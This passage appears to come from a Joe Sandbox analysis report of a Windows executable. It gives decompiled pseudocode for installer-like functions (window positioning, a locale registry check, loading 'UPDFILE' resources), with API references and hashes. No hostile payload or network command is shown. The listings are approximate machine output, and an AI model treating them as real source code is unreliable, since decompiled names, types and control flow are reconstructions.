                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E001F1680(_t65, E001F17C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x001f2aac
                                                                                                                                                                                                        0x001f2ab7
                                                                                                                                                                                                        0x001f2abc
                                                                                                                                                                                                        0x001f2abe
                                                                                                                                                                                                        0x001f2ac3
                                                                                                                                                                                                        0x001f2ac6
                                                                                                                                                                                                        0x001f2ac9
                                                                                                                                                                                                        0x001f2ace
                                                                                                                                                                                                        0x001f2ae6
                                                                                                                                                                                                        0x001f2bdc
                                                                                                                                                                                                        0x001f2bdc
                                                                                                                                                                                                        0x001f2be0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2af2
                                                                                                                                                                                                        0x001f2afc
                                                                                                                                                                                                        0x001f2b00
                                                                                                                                                                                                        0x001f2b05
                                                                                                                                                                                                        0x001f2b05
                                                                                                                                                                                                        0x001f2b0b
                                                                                                                                                                                                        0x001f2bca
                                                                                                                                                                                                        0x001f2bd1
                                                                                                                                                                                                        0x001f2b11
                                                                                                                                                                                                        0x001f2b18
                                                                                                                                                                                                        0x001f2b26
                                                                                                                                                                                                        0x001f2b99
                                                                                                                                                                                                        0x001f2bc8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2b9b
                                                                                                                                                                                                        0x001f2bae
                                                                                                                                                                                                        0x001f2bb3
                                                                                                                                                                                                        0x001f2bb5
                                                                                                                                                                                                        0x001f2bb5
                                                                                                                                                                                                        0x001f2bb8
                                                                                                                                                                                                        0x001f2bb8
                                                                                                                                                                                                        0x001f2bba
                                                                                                                                                                                                        0x001f2bbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2bb8
                                                                                                                                                                                                        0x001f2b28
                                                                                                                                                                                                        0x001f2b2e
                                                                                                                                                                                                        0x001f2b33
                                                                                                                                                                                                        0x001f2b39
                                                                                                                                                                                                        0x001f2b3c
                                                                                                                                                                                                        0x001f2b3c
                                                                                                                                                                                                        0x001f2b3e
                                                                                                                                                                                                        0x001f2b3f
                                                                                                                                                                                                        0x001f2b55
                                                                                                                                                                                                        0x001f2b5d
                                                                                                                                                                                                        0x001f2b64
                                                                                                                                                                                                        0x001f2b64
                                                                                                                                                                                                        0x001f2b7a
                                                                                                                                                                                                        0x001f2b7f
                                                                                                                                                                                                        0x001f2b81
                                                                                                                                                                                                        0x001f2b81
                                                                                                                                                                                                        0x001f2b84
                                                                                                                                                                                                        0x001f2b84
                                                                                                                                                                                                        0x001f2b86
                                                                                                                                                                                                        0x001f2b87
                                                                                                                                                                                                        0x001f2bbf
                                                                                                                                                                                                        0x001f2bc1
                                                                                                                                                                                                        0x001f2bc1
                                                                                                                                                                                                        0x001f2b26
                                                                                                                                                                                                        0x001f2bda
                                                                                                                                                                                                        0x001f2bda
                                                                                                                                                                                                        0x001f2be6
                                                                                                                                                                                                        0x001f2be6
                                                                                                                                                                                                        0x001f2bf8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 001F2AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 001F2AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 001F2B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 001F2B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 001F2B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 001F2BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: a2974eb6f205937d9fc84d938051a3eea8fc23165c72355307450cb02cd78064
                                                                                                                                                                                                        • Instruction ID: 85d9feb215720b351e0b0463a266ba034455ed9acaade5e3128031f0854c9f3e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2974eb6f205937d9fc84d938051a3eea8fc23165c72355307450cb02cd78064
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F04167741082499FDB259F308C54AFD7BA99F56310F0400DAEDC683602DF798E86CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E001F43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				struct tagRECT _v24;
                                                                                                                                                                                                        				struct tagRECT _v40;
                                                                                                                                                                                                        				struct HWND__* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				int _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				int _v60;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				struct HWND__* _t63;
                                                                                                                                                                                                        				struct HWND__* _t67;
                                                                                                                                                                                                        				struct HWND__* _t68;
                                                                                                                                                                                                        				struct HDC__* _t69;
                                                                                                                                                                                                        				int _t72;
                                                                                                                                                                                                        				signed int _t74;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t63 = __edx;
                                                                                                                                                                                                        				_t29 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                        				_t68 = __edx;
                                                                                                                                                                                                        				_v44 = __ecx;
                                                                                                                                                                                                        				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                        				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                        				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                        				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                        				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                        				_t69 = GetDC(_v44);
                                                                                                                                                                                                        				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                        				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                        				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                        				_t56 = _v48;
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                        				_t67 = 0;
                                                                                                                                                                                                        				if(_t72 >= 0) {
                                                                                                                                                                                                        					_t63 = _v52;
                                                                                                                                                                                                        					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                        						_t72 = _t63 - _t56;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t72 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                                        				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                        				if(_t59 >= 0) {
                                                                                                                                                                                                        					_t63 = _v60;
                                                                                                                                                                                                        					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                        						_t59 = _t63 - _t53;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t59 = _t67;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                        			}
























                                                                                                                                                                                                        0x001f43d0
                                                                                                                                                                                                        0x001f43d8
                                                                                                                                                                                                        0x001f43df
                                                                                                                                                                                                        0x001f43e6
                                                                                                                                                                                                        0x001f43ec
                                                                                                                                                                                                        0x001f43f1
                                                                                                                                                                                                        0x001f4400
                                                                                                                                                                                                        0x001f4403
                                                                                                                                                                                                        0x001f440b
                                                                                                                                                                                                        0x001f4420
                                                                                                                                                                                                        0x001f4429
                                                                                                                                                                                                        0x001f4437
                                                                                                                                                                                                        0x001f4444
                                                                                                                                                                                                        0x001f4447
                                                                                                                                                                                                        0x001f444d
                                                                                                                                                                                                        0x001f4454
                                                                                                                                                                                                        0x001f445b
                                                                                                                                                                                                        0x001f4460
                                                                                                                                                                                                        0x001f4461
                                                                                                                                                                                                        0x001f4467
                                                                                                                                                                                                        0x001f446f
                                                                                                                                                                                                        0x001f4473
                                                                                                                                                                                                        0x001f4473
                                                                                                                                                                                                        0x001f4463
                                                                                                                                                                                                        0x001f4463
                                                                                                                                                                                                        0x001f4463
                                                                                                                                                                                                        0x001f447a
                                                                                                                                                                                                        0x001f4481
                                                                                                                                                                                                        0x001f4484
                                                                                                                                                                                                        0x001f448a
                                                                                                                                                                                                        0x001f4492
                                                                                                                                                                                                        0x001f4496
                                                                                                                                                                                                        0x001f4496
                                                                                                                                                                                                        0x001f4486
                                                                                                                                                                                                        0x001f4486
                                                                                                                                                                                                        0x001f4486
                                                                                                                                                                                                        0x001f44b8

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 001F43F1
                                                                                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 001F440B
                                                                                                                                                                                                        • GetDC.USER32(?), ref: 001F4423
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 001F442E
                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 001F443A
                                                                                                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 001F4447
                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,00000001), ref: 001F44A2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2212493051-0
                                                                                                                                                                                                        • Opcode ID: 8782593780e11f470a3cdb0b5bfe5db10bc0276b605fbc473430f4d515e66007
                                                                                                                                                                                                        • Instruction ID: f514ca81197ad17c158427381925d068fb1bf0e8b39806e8bf6e3887dc8dfb01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8782593780e11f470a3cdb0b5bfe5db10bc0276b605fbc473430f4d515e66007
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E9311772A00119AFCB14CFB8DD899FEBBB9EF89310F554169F905B3250DA34AD45CB60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 53%
                                                                                                                                                                                                        			E001F6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v28;
                                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                                        				struct HINSTANCE__* _v36;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				struct HRSRC__* _t21;
                                                                                                                                                                                                        				intOrPtr _t26;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E001F171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0x1f9124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0x1fa288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E001F171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E001F6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}






















                                                                                                                                                                                                        0x001f6298
                                                                                                                                                                                                        0x001f62a0
                                                                                                                                                                                                        0x001f62a7
                                                                                                                                                                                                        0x001f62ad
                                                                                                                                                                                                        0x001f62af
                                                                                                                                                                                                        0x001f62bb
                                                                                                                                                                                                        0x001f62c3
                                                                                                                                                                                                        0x001f62c4
                                                                                                                                                                                                        0x001f633b
                                                                                                                                                                                                        0x001f633b
                                                                                                                                                                                                        0x001f6345
                                                                                                                                                                                                        0x001f634d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f62da
                                                                                                                                                                                                        0x001f62de
                                                                                                                                                                                                        0x001f635f
                                                                                                                                                                                                        0x001f6369
                                                                                                                                                                                                        0x001f62e0
                                                                                                                                                                                                        0x001f62e0
                                                                                                                                                                                                        0x001f62e0
                                                                                                                                                                                                        0x001f62e3
                                                                                                                                                                                                        0x001f62e5
                                                                                                                                                                                                        0x001f62e5
                                                                                                                                                                                                        0x001f62e8
                                                                                                                                                                                                        0x001f62e8
                                                                                                                                                                                                        0x001f62ea
                                                                                                                                                                                                        0x001f62eb
                                                                                                                                                                                                        0x001f62ef
                                                                                                                                                                                                        0x001f62f1
                                                                                                                                                                                                        0x001f62f3
                                                                                                                                                                                                        0x001f6302
                                                                                                                                                                                                        0x001f6308
                                                                                                                                                                                                        0x001f630d
                                                                                                                                                                                                        0x001f6314
                                                                                                                                                                                                        0x001f6314
                                                                                                                                                                                                        0x001f6316
                                                                                                                                                                                                        0x001f6319
                                                                                                                                                                                                        0x001f6355
                                                                                                                                                                                                        0x001f6357
                                                                                                                                                                                                        0x001f631b
                                                                                                                                                                                                        0x001f631b
                                                                                                                                                                                                        0x001f6331
                                                                                                                                                                                                        0x001f6334
                                                                                                                                                                                                        0x001f6339
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6339
                                                                                                                                                                                                        0x001f6319
                                                                                                                                                                                                        0x001f636b
                                                                                                                                                                                                        0x001f637d
                                                                                                                                                                                                        0x001f637d
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 001F171E: _vsnprintf.MSVCRT ref: 001F1750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F62CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F62D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 001F6345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,001F51CA,00000004,00000024,001F2F71,?,00000002,00000000), ref: 001F6357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: 632c99a07f5646e912cf4a2ccfa076675c183b6233e5b5d47103aee2ee91796b
                                                                                                                                                                                                        • Instruction ID: b3fa8fe0ea66f90fdfc7bfd3e9fe6e6ada3d215829773bc2ccb687148f9dbce6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 632c99a07f5646e912cf4a2ccfa076675c183b6233e5b5d47103aee2ee91796b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF21F6B5A0021DABDB149F649C459BE7B7CFF45710B010119FA0AA3641DB399D42CBE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E001F681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0x1f81d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0x1f81d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0x1f81d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0x1f1140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E001F66F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0x1f81d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x001f681f
                                                                                                                                                                                                        0x001f682a
                                                                                                                                                                                                        0x001f6831
                                                                                                                                                                                                        0x001f6836
                                                                                                                                                                                                        0x001f683c
                                                                                                                                                                                                        0x001f683e
                                                                                                                                                                                                        0x001f6848
                                                                                                                                                                                                        0x001f6851
                                                                                                                                                                                                        0x001f685d
                                                                                                                                                                                                        0x001f6864
                                                                                                                                                                                                        0x001f6876
                                                                                                                                                                                                        0x001f693a
                                                                                                                                                                                                        0x001f693a
                                                                                                                                                                                                        0x001f687c
                                                                                                                                                                                                        0x001f687e
                                                                                                                                                                                                        0x001f6885
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f68d6
                                                                                                                                                                                                        0x001f68f4
                                                                                                                                                                                                        0x001f6900
                                                                                                                                                                                                        0x001f6902
                                                                                                                                                                                                        0x001f690a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f690c
                                                                                                                                                                                                        0x001f690c
                                                                                                                                                                                                        0x001f691c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f691e
                                                                                                                                                                                                        0x001f6924
                                                                                                                                                                                                        0x001f692b
                                                                                                                                                                                                        0x001f6932
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f692b
                                                                                                                                                                                                        0x001f691c
                                                                                                                                                                                                        0x001f690a
                                                                                                                                                                                                        0x001f6885
                                                                                                                                                                                                        0x001f6876
                                                                                                                                                                                                        0x001f6951

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 001F686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 001F68A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001F68CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,001F1140,00000000,?,?,0000000C), ref: 001F68F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 001F6902
                                                                                                                                                                                                          • Part of subcall function 001F66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,001F691A), ref: 001F6741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Control Panel\Desktop\ResourceLocale, xrefs: 001F68C2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-1109908249
                                                                                                                                                                                                        • Opcode ID: 2676481d25a0446c4ab92669b80a27c413ae22b8c4ce7d62e731b9cadbf8ed7d
                                                                                                                                                                                                        • Instruction ID: 24fecf849729397229222a6e7a4038e0860f7b8f8917ccfc2c714899ce44f24d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2676481d25a0446c4ab92669b80a27c413ae22b8c4ce7d62e731b9cadbf8ed7d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB314C71A0021C9FDB219F11DC45BBAB7B8FB45768F4001A5EA4DA2140DB709A85CB52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F3A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
